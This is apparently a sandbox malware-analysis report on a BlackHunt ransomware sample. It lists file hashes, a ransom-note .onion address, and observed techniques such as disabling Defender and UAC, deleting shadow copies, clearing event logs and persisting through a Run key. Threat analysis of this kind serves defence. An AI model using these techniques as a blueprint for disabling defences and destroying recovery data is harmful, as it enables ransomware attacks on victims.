Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:39
Static task
static1
Behavioral task
behavioral1
Sample
b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe
Resource
win10v2004-20231222-en
General
-
Target
b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe
-
Size
707KB
-
MD5
21a2cb88350eef31f1b32f1e17d38f2a
-
SHA1
ace348a0f1cdd3d555472a651e2cc9011329f2bb
-
SHA256
b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6
-
SHA512
8e8ad97d1b54148acceac35a55c6adcc3aac120874312a3c47826f76c1abea9a29df78bcaa57cb36c2e9c312d712c25386b791d1f0d36dffbb1f07bca0668627
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza138avnh:6uaTmkZJ+naie5OTamgEoKxLW+0h
Malware Config
Extracted
C:\Program Files\7-Zip\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2756 fsutil.exe 4132 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2484 wevtutil.exe 3736 wevtutil.exe 3260 wevtutil.exe 3804 wevtutil.exe 4408 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 580 bcdedit.exe 1136 bcdedit.exe 1328 bcdedit.exe 4232 bcdedit.exe -
Renames multiple (2868) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2220 wbadmin.exe 4252 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1988 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\W: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\Y: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\G: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\X: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\U: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\V: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\F: reg.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\L: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\T: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\S: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\J: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\R: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\K: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\E: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\O: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\H: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\I: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\P: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\A: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\Z: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened (read-only) \??\B: b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#BlackHunt_ReadMe.txt b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_ButtonGraphic.png b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#BlackHunt_ReadMe.txt b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\#BlackHunt_ReadMe.txt b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#BlackHunt_Private.key b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Oral b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.lock b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_Private.key b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#BlackHunt_Private.key b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#BlackHunt_ReadMe.txt b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\203x8subpicture.png b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#BlackHunt_ReadMe.hta b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#BlackHunt_Private.key b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\VideoLAN\VLC\locale\my\#BlackHunt_ReadMe.txt b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tirane b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_ReadMe.txt b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\#BlackHunt_ReadMe.hta b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\winamp2.xml b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#BlackHunt_ReadMe.hta b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.hta b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\#BlackHunt_ReadMe.txt b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_ReadMe.hta b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.hta b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.log b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2424 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1200 vssadmin.exe 2280 vssadmin.exe 1684 vssadmin.exe 2096 vssadmin.exe 2088 vssadmin.exe 1804 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4244 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4200 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1612 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe Token: SeRestorePrivilege 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe Token: SeBackupPrivilege 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe Token: SeTakeOwnershipPrivilege 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe Token: SeAuditPrivilege 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe Token: SeSecurityPrivilege 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe Token: SeIncBasePriorityPrivilege 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe Token: SeBackupPrivilege 2188 vssvc.exe Token: SeRestorePrivilege 2188 vssvc.exe Token: SeAuditPrivilege 2188 vssvc.exe Token: SeBackupPrivilege 2104 wbengine.exe Token: SeRestorePrivilege 2104 wbengine.exe Token: SeSecurityPrivilege 2104 wbengine.exe Token: SeSecurityPrivilege 3804 wevtutil.exe Token: SeSecurityPrivilege 4408 wevtutil.exe Token: SeBackupPrivilege 3804 wevtutil.exe Token: SeBackupPrivilege 4408 wevtutil.exe Token: SeSecurityPrivilege 3260 wevtutil.exe Token: SeBackupPrivilege 3260 wevtutil.exe Token: SeSecurityPrivilege 2484 wevtutil.exe Token: SeBackupPrivilege 2484 wevtutil.exe Token: SeSecurityPrivilege 3736 wevtutil.exe Token: SeBackupPrivilege 3736 wevtutil.exe Token: SeDebugPrivilege 4244 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2028 wrote to memory of 2076 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 154 PID 2028 wrote to memory of 2076 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 154 PID 2028 wrote to memory of 2076 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 154 PID 2028 wrote to memory of 2076 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 154 PID 2028 wrote to memory of 2292 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 153 PID 2028 wrote to memory of 2292 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 153 PID 2028 wrote to memory of 2292 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 153 PID 2028 wrote to memory of 2292 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 153 PID 2028 wrote to memory of 2340 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 151 PID 2028 wrote to memory of 2340 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 151 PID 2028 wrote to memory of 2340 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 151 PID 2028 wrote to memory of 2340 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 151 PID 2076 wrote to memory of 2572 2076 cmd.exe 30 PID 2076 wrote to memory of 2572 2076 cmd.exe 30 PID 2076 wrote to memory of 2572 2076 cmd.exe 30 PID 2028 wrote to memory of 2608 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 149 PID 2028 wrote to memory of 2608 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 149 PID 2028 wrote to memory of 2608 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 149 PID 2028 wrote to memory of 2608 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 149 PID 2292 wrote to memory of 2672 2292 cmd.exe 147 PID 2292 wrote to memory of 2672 2292 cmd.exe 147 PID 2292 wrote to memory of 2672 2292 cmd.exe 147 PID 2028 wrote to memory of 2684 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 31 PID 2028 wrote to memory of 2684 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 31 PID 2028 wrote to memory of 2684 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 31 PID 2028 wrote to memory of 2684 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 31 PID 2028 wrote to memory of 2716 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 146 PID 2028 wrote to memory of 2716 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 146 PID 2028 wrote to memory of 2716 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 146 PID 2028 wrote to memory of 2716 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 146 PID 2340 wrote to memory of 2696 2340 cmd.exe 145 PID 2340 wrote to memory of 2696 2340 cmd.exe 145 PID 2340 wrote to memory of 2696 2340 cmd.exe 145 PID 2028 wrote to memory of 2620 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 144 PID 2028 wrote to memory of 2620 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 144 PID 2028 wrote to memory of 2620 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 144 PID 2028 wrote to memory of 2620 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 144 PID 2028 wrote to memory of 2628 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 140 PID 2028 wrote to memory of 2628 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 140 PID 2028 wrote to memory of 2628 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 140 PID 2028 wrote to memory of 2628 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 140 PID 2028 wrote to memory of 2816 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 33 PID 2028 wrote to memory of 2816 2028 